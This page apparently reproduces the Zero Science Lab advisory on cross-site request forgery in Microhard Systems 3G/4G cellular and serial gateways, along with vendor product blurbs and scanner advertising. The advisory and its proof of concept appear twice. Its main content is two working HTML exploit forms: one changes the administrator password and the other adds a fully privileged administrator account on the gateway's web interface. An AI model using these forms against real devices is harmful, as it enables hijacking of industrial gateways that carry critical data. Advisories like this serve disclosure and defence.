microhard systems 3g4g cellular ethernet and serial gateway crosssite request forgery

▸▸▸ Exploit & Vulnerability >>   webapps exploit & hardware vulnerability




Online Vulnerability Scanner Tools
microhard systems 3g4g cellular ethernet and serial gateway crosssite request forgery Code Code... 
				
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities


Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
                  IPn3Gb 2.2.0 build 2160
                  IPn4Gb 1.1.6 build 1184-14
                  IPn4Gb 1.1.0 Rev 2 build 1090-2
                  IPn4Gb 1.1.0 Rev 2 build 1086
                  Bullet-3G 1.2.0 Rev A build 1032
                  VIP4Gb 1.1.6 build 1204
                  VIP4G 1.1.6 Rev 3.0 build 1184-14
                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
                  IPn3Gii / Bullet-3G 1.2.0 build 1076
                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
                  BulletPlus 1.3.0 build 1036
                  Dragon-LTE 1.1.0 build 1036

Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!

The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.

The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!

The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!

The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.

Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: httpd-ssl-1.0.0
           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5478
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php


13.03.2018

--


CSRF Change Admin password:
---------------------------

<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="submit" value="1" />
      <input type="hidden" name="pw1" value="nimda" />
      <input type="hidden" name="pw2" value="nimda" />
      <input type="hidden" name="passwdchange" value=" Change Passwd " />
      <input type="hidden" name="user_add" value="" />
      <input type="hidden" name="password_add" value="" />
      <input type="hidden" name="password2_add" value="" />
      <input type="hidden" name="Carrier_enable" value="0" />
      <input type="hidden" name="Carrier_Status" value="0" />
      <input type="hidden" name="Carrier_Settings" value="0" />
      <input type="hidden" name="Carrier_Keepalive" value="0" />
      <input type="hidden" name="Carrier_TrafficWatchdog" value="0" />
      <input type="hidden" name="Carrier_DynamicDNS" value="0" />
      <input type="hidden" name="Carrier_SMSConfig" value="0" />
      <input type="hidden" name="Carrier_SMS" value="0" />
      <input type="hidden" name="Carrier_DataUsage" value="0" />
      <input type="hidden" name="Comport_enable" value="0" />
      <input type="hidden" name="Comport_Status" value="0" />
      <input type="hidden" name="Comport_Com0" value="0" />
      <input type="hidden" name="Comport_Com1" value="0" />
      <input type="hidden" name="Firewall_enable" value="0" />
      <input type="hidden" name="Firewall_Status" value="0" />
      <input type="hidden" name="Firewall_General" value="0" />
      <input type="hidden" name="Firewall_Rules" value="0" />
      <input type="hidden" name="Firewall_PortForwarding" value="0" />
      <input type="hidden" name="Firewall_MACIPList" value="0" />
      <input type="hidden" name="Firewall_Reset" value="0" />
      <input type="hidden" name="GPS_enable" value="0" />
      <input type="hidden" name="GPS_Location" value="0" />
      <input type="hidden" name="GPS_Settings" value="0" />
      <input type="hidden" name="GPS_Report" value="0" />
      <input type="hidden" name="GPS_GpsGate" value="0" />
      <input type="hidden" name="GPS_Recorder" value="0" />
      <input type="hidden" name="GPS_LoadRecord" value="0" />
      <input type="hidden" name="I/O_enable" value="0" />
      <input type="hidden" name="I/O_Status" value="0" />
      <input type="hidden" name="I/O_OUTPUT" value="0" />
      <input type="hidden" name="Network_enable" value="0" />
      <input type="hidden" name="Network_Status" value="0" />
      <input type="hidden" name="Network_LAN" value="0" />
      <input type="hidden" name="Network_Routes" value="0" />
      <input type="hidden" name="Network_GRE" value="0" />
      <input type="hidden" name="Network_PIMSM" value="0" />
      <input type="hidden" name="Network_SNMP" value="0" />
      <input type="hidden" name="Network_sdpServer" value="0" />
      <input type="hidden" name="Network_LocalMonitor" value="0" />
      <input type="hidden" name="Network_Port" value="0" />
      <input type="hidden" name="System_enable" value="0" />
      <input type="hidden" name="System_Settings" value="0" />
      <input type="hidden" name="System_AccessControl" value="0" />
      <input type="hidden" name="System_Services" value="0" />
      <input type="hidden" name="System_Maintenance" value="0" />
      <input type="hidden" name="System_Reboot" value="0" />
      <input type="hidden" name="Tools_enable" value="0" />
      <input type="hidden" name="Tools_Discovery" value="0" />
      <input type="hidden" name="Tools_NetflowReport" value="0" />
      <input type="hidden" name="Tools_NMSSettings" value="0" />
      <input type="hidden" name="Tools_EventReport" value="0" />
      <input type="hidden" name="Tools_Modbus" value="0" />
      <input type="hidden" name="Tools_Websocket" value="0" />
      <input type="hidden" name="Tools_SiteSurvey" value="0" />
      <input type="hidden" name="Tools_Ping" value="0" />
      <input type="hidden" name="Tools_TraceRoute" value="0" />
      <input type="hidden" name="Tools_NetworkTraffic" value="0" />
      <input type="hidden" name="VPN_enable" value="0" />
      <input type="hidden" name="VPN_Summary" value="0" />
      <input type="hidden" name="VPN_GatewayToGateway" value="0" />
      <input type="hidden" name="VPN_ClientToGateway" value="0" />
      <input type="hidden" name="VPN_VPNClientAccess" value="0" />
      <input type="hidden" name="VPN_CertificateManagement" value="0" />
      <input type="hidden" name="VPN_CiscoEasyVPNClient" value="0" />
      <input type="submit" value="Change" />
    </form>
  </body>
</html>


CSRF Add Admin:
---------------

<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="submit" value="1" />
      <input type="hidden" name="pw1" value="" />
      <input type="hidden" name="pw2" value="" />
      <input type="hidden" name="user_add" value="testingus" />
      <input type="hidden" name="password_add" value="123456" />
      <input type="hidden" name="password2_add" value="123456" />
      <input type="hidden" name="Carrier_enable" value="1" />
      <input type="hidden" name="Carrier_Status" value="1" />
      <input type="hidden" name="Carrier_Settings" value="1" />
      <input type="hidden" name="Carrier_Keepalive" value="1" />
      <input type="hidden" name="Carrier_TrafficWatchdog" value="1" />
      <input type="hidden" name="Carrier_DynamicDNS" value="1" />
      <input type="hidden" name="Carrier_SMSConfig" value="1" />
      <input type="hidden" name="Carrier_SMS" value="1" />
      <input type="hidden" name="Carrier_DataUsage" value="1" />
      <input type="hidden" name="Comport_enable" value="1" />
      <input type="hidden" name="Comport_Status" value="1" />
      <input type="hidden" name="Comport_Com0" value="1" />
      <input type="hidden" name="Comport_Com1" value="1" />
      <input type="hidden" name="Firewall_enable" value="1" />
      <input type="hidden" name="Firewall_Status" value="1" />
      <input type="hidden" name="Firewall_General" value="1" />
      <input type="hidden" name="Firewall_Rules" value="1" />
      <input type="hidden" name="Firewall_PortForwarding" value="1" />
      <input type="hidden" name="Firewall_MACIPList" value="1" />
      <input type="hidden" name="Firewall_Reset" value="1" />
      <input type="hidden" name="GPS_enable" value="1" />
      <input type="hidden" name="GPS_Location" value="1" />
      <input type="hidden" name="GPS_Settings" value="1" />
      <input type="hidden" name="GPS_Report" value="1" />
      <input type="hidden" name="GPS_GpsGate" value="1" />
      <input type="hidden" name="GPS_Recorder" value="1" />
      <input type="hidden" name="GPS_LoadRecord" value="1" />
      <input type="hidden" name="I/O_enable" value="1" />
      <input type="hidden" name="I/O_Status" value="1" />
      <input type="hidden" name="I/O_OUTPUT" value="1" />
      <input type="hidden" name="Network_enable" value="1" />
      <input type="hidden" name="Network_Status" value="1" />
      <input type="hidden" name="Network_LAN" value="1" />
      <input type="hidden" name="Network_Routes" value="1" />
      <input type="hidden" name="Network_GRE" value="1" />
      <input type="hidden" name="Network_PIMSM" value="1" />
      <input type="hidden" name="Network_SNMP" value="1" />
      <input type="hidden" name="Network_sdpServer" value="1" />
      <input type="hidden" name="Network_LocalMonitor" value="1" />
      <input type="hidden" name="Network_Port" value="1" />
      <input type="hidden" name="System_enable" value="1" />
      <input type="hidden" name="System_Settings" value="1" />
      <input type="hidden" name="System_AccessControl" value="1" />
      <input type="hidden" name="System_Services" value="1" />
      <input type="hidden" name="System_Maintenance" value="1" />
      <input type="hidden" name="System_Reboot" value="1" />
      <input type="hidden" name="Tools_enable" value="1" />
      <input type="hidden" name="Tools_Discovery" value="1" />
      <input type="hidden" name="Tools_NetflowReport" value="1" />
      <input type="hidden" name="Tools_NMSSettings" value="1" />
      <input type="hidden" name="Tools_EventReport" value="1" />
      <input type="hidden" name="Tools_Modbus" value="1" />
      <input type="hidden" name="Tools_Websocket" value="1" />
      <input type="hidden" name="Tools_SiteSurvey" value="1" />
      <input type="hidden" name="Tools_Ping" value="1" />
      <input type="hidden" name="Tools_TraceRoute" value="1" />
      <input type="hidden" name="Tools_NetworkTraffic" value="1" />
      <input type="hidden" name="VPN_enable" value="1" />
      <input type="hidden" name="VPN_Summary" value="1" />
      <input type="hidden" name="VPN_GatewayToGateway" value="1" />
      <input type="hidden" name="VPN_ClientToGateway" value="1" />
      <input type="hidden" name="VPN_VPNClientAccess" value="1" />
      <input type="hidden" name="VPN_CertificateManagement" value="1" />
      <input type="hidden" name="VPN_CiscoEasyVPNClient" value="1" />
      <input type="hidden" name="mhadd_user" value="Add User" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>
            Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities


Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
                  IPn3Gb 2.2.0 build 2160
                  IPn4Gb 1.1.6 build 1184-14
                  IPn4Gb 1.1.0 Rev 2 build 1090-2
                  IPn4Gb 1.1.0 Rev 2 build 1086
                  Bullet-3G 1.2.0 Rev A build 1032
                  VIP4Gb 1.1.6 build 1204
                  VIP4G 1.1.6 Rev 3.0 build 1184-14
                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
                  IPn3Gii / Bullet-3G 1.2.0 build 1076
                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
                  BulletPlus 1.3.0 build 1036
                  Dragon-LTE 1.1.0 build 1036

Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!

The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.

The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!

The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!

The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.

Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: httpd-ssl-1.0.0
           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5478
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php


13.03.2018

--


CSRF Change Admin password:
---------------------------

<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="submit" value="1" />
      <input type="hidden" name="pw1" value="nimda" />
      <input type="hidden" name="pw2" value="nimda" />
      <input type="hidden" name="passwdchange" value=" Change Passwd " />
      <input type="hidden" name="user_add" value="" />
      <input type="hidden" name="password_add" value="" />
      <input type="hidden" name="password2_add" value="" />
      <input type="hidden" name="Carrier_enable" value="0" />
      <input type="hidden" name="Carrier_Status" value="0" />
      <input type="hidden" name="Carrier_Settings" value="0" />
      <input type="hidden" name="Carrier_Keepalive" value="0" />
      <input type="hidden" name="Carrier_TrafficWatchdog" value="0" />
      <input type="hidden" name="Carrier_DynamicDNS" value="0" />
      <input type="hidden" name="Carrier_SMSConfig" value="0" />
      <input type="hidden" name="Carrier_SMS" value="0" />
      <input type="hidden" name="Carrier_DataUsage" value="0" />
      <input type="hidden" name="Comport_enable" value="0" />
      <input type="hidden" name="Comport_Status" value="0" />
      <input type="hidden" name="Comport_Com0" value="0" />
      <input type="hidden" name="Comport_Com1" value="0" />
      <input type="hidden" name="Firewall_enable" value="0" />
      <input type="hidden" name="Firewall_Status" value="0" />
      <input type="hidden" name="Firewall_General" value="0" />
      <input type="hidden" name="Firewall_Rules" value="0" />
      <input type="hidden" name="Firewall_PortForwarding" value="0" />
      <input type="hidden" name="Firewall_MACIPList" value="0" />
      <input type="hidden" name="Firewall_Reset" value="0" />
      <input type="hidden" name="GPS_enable" value="0" />
      <input type="hidden" name="GPS_Location" value="0" />
      <input type="hidden" name="GPS_Settings" value="0" />
      <input type="hidden" name="GPS_Report" value="0" />
      <input type="hidden" name="GPS_GpsGate" value="0" />
      <input type="hidden" name="GPS_Recorder" value="0" />
      <input type="hidden" name="GPS_LoadRecord" value="0" />
      <input type="hidden" name="I/O_enable" value="0" />
      <input type="hidden" name="I/O_Status" value="0" />
      <input type="hidden" name="I/O_OUTPUT" value="0" />
      <input type="hidden" name="Network_enable" value="0" />
      <input type="hidden" name="Network_Status" value="0" />
      <input type="hidden" name="Network_LAN" value="0" />
      <input type="hidden" name="Network_Routes" value="0" />
      <input type="hidden" name="Network_GRE" value="0" />
      <input type="hidden" name="Network_PIMSM" value="0" />
      <input type="hidden" name="Network_SNMP" value="0" />
      <input type="hidden" name="Network_sdpServer" value="0" />
      <input type="hidden" name="Network_LocalMonitor" value="0" />
      <input type="hidden" name="Network_Port" value="0" />
      <input type="hidden" name="System_enable" value="0" />
      <input type="hidden" name="System_Settings" value="0" />
      <input type="hidden" name="System_AccessControl" value="0" />
      <input type="hidden" name="System_Services" value="0" />
      <input type="hidden" name="System_Maintenance" value="0" />
      <input type="hidden" name="System_Reboot" value="0" />
      <input type="hidden" name="Tools_enable" value="0" />
      <input type="hidden" name="Tools_Discovery" value="0" />
      <input type="hidden" name="Tools_NetflowReport" value="0" />
      <input type="hidden" name="Tools_NMSSettings" value="0" />
      <input type="hidden" name="Tools_EventReport" value="0" />
      <input type="hidden" name="Tools_Modbus" value="0" />
      <input type="hidden" name="Tools_Websocket" value="0" />
      <input type="hidden" name="Tools_SiteSurvey" value="0" />
      <input type="hidden" name="Tools_Ping" value="0" />
      <input type="hidden" name="Tools_TraceRoute" value="0" />
      <input type="hidden" name="Tools_NetworkTraffic" value="0" />
      <input type="hidden" name="VPN_enable" value="0" />
      <input type="hidden" name="VPN_Summary" value="0" />
      <input type="hidden" name="VPN_GatewayToGateway" value="0" />
      <input type="hidden" name="VPN_ClientToGateway" value="0" />
      <input type="hidden" name="VPN_VPNClientAccess" value="0" />
      <input type="hidden" name="VPN_CertificateManagement" value="0" />
      <input type="hidden" name="VPN_CiscoEasyVPNClient" value="0" />
      <input type="submit" value="Change" />
    </form>
  </body>
</html>


CSRF Add Admin:
---------------

<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="submit" value="1" />
      <input type="hidden" name="pw1" value="" />
      <input type="hidden" name="pw2" value="" />
      <input type="hidden" name="user_add" value="testingus" />
      <input type="hidden" name="password_add" value="123456" />
      <input type="hidden" name="password2_add" value="123456" />
      <input type="hidden" name="Carrier_enable" value="1" />
      <input type="hidden" name="Carrier_Status" value="1" />
      <input type="hidden" name="Carrier_Settings" value="1" />
      <input type="hidden" name="Carrier_Keepalive" value="1" />
      <input type="hidden" name="Carrier_TrafficWatchdog" value="1" />
      <input type="hidden" name="Carrier_DynamicDNS" value="1" />
      <input type="hidden" name="Carrier_SMSConfig" value="1" />
      <input type="hidden" name="Carrier_SMS" value="1" />
      <input type="hidden" name="Carrier_DataUsage" value="1" />
      <input type="hidden" name="Comport_enable" value="1" />
      <input type="hidden" name="Comport_Status" value="1" />
      <input type="hidden" name="Comport_Com0" value="1" />
      <input type="hidden" name="Comport_Com1" value="1" />
      <input type="hidden" name="Firewall_enable" value="1" />
      <input type="hidden" name="Firewall_Status" value="1" />
      <input type="hidden" name="Firewall_General" value="1" />
      <input type="hidden" name="Firewall_Rules" value="1" />
      <input type="hidden" name="Firewall_PortForwarding" value="1" />
      <input type="hidden" name="Firewall_MACIPList" value="1" />
      <input type="hidden" name="Firewall_Reset" value="1" />
      <input type="hidden" name="GPS_enable" value="1" />
      <input type="hidden" name="GPS_Location" value="1" />
      <input type="hidden" name="GPS_Settings" value="1" />
      <input type="hidden" name="GPS_Report" value="1" />
      <input type="hidden" name="GPS_GpsGate" value="1" />
      <input type="hidden" name="GPS_Recorder" value="1" />
      <input type="hidden" name="GPS_LoadRecord" value="1" />
      <input type="hidden" name="I/O_enable" value="1" />
      <input type="hidden" name="I/O_Status" value="1" />
      <input type="hidden" name="I/O_OUTPUT" value="1" />
      <input type="hidden" name="Network_enable" value="1" />
      <input type="hidden" name="Network_Status" value="1" />
      <input type="hidden" name="Network_LAN" value="1" />
      <input type="hidden" name="Network_Routes" value="1" />
      <input type="hidden" name="Network_GRE" value="1" />
      <input type="hidden" name="Network_PIMSM" value="1" />
      <input type="hidden" name="Network_SNMP" value="1" />
      <input type="hidden" name="Network_sdpServer" value="1" />
      <input type="hidden" name="Network_LocalMonitor" value="1" />
      <input type="hidden" name="Network_Port" value="1" />
      <input type="hidden" name="System_enable" value="1" />
      <input type="hidden" name="System_Settings" value="1" />
      <input type="hidden" name="System_AccessControl" value="1" />
      <input type="hidden" name="System_Services" value="1" />
      <input type="hidden" name="System_Maintenance" value="1" />
      <input type="hidden" name="System_Reboot" value="1" />
      <input type="hidden" name="Tools_enable" value="1" />
      <input type="hidden" name="Tools_Discovery" value="1" />
      <input type="hidden" name="Tools_NetflowReport" value="1" />
      <input type="hidden" name="Tools_NMSSettings" value="1" />
      <input type="hidden" name="Tools_EventReport" value="1" />
      <input type="hidden" name="Tools_Modbus" value="1" />
      <input type="hidden" name="Tools_Websocket" value="1" />
      <input type="hidden" name="Tools_SiteSurvey" value="1" />
      <input type="hidden" name="Tools_Ping" value="1" />
      <input type="hidden" name="Tools_TraceRoute" value="1" />
      <input type="hidden" name="Tools_NetworkTraffic" value="1" />
      <input type="hidden" name="VPN_enable" value="1" />
      <input type="hidden" name="VPN_Summary" value="1" />
      <input type="hidden" name="VPN_GatewayToGateway" value="1" />
      <input type="hidden" name="VPN_ClientToGateway" value="1" />
      <input type="hidden" name="VPN_VPNClientAccess" value="1" />
      <input type="hidden" name="VPN_CertificateManagement" value="1" />
      <input type="hidden" name="VPN_CiscoEasyVPNClient" value="1" />
      <input type="hidden" name="mhadd_user" value="Add User" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>

Microhard systems 3g4g cellular ethernet and serial gateway crosssite request forgery Vulnerability / Exploit Source : Microhard systems 3g4g cellular ethernet and serial gateway crosssite request forgery



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.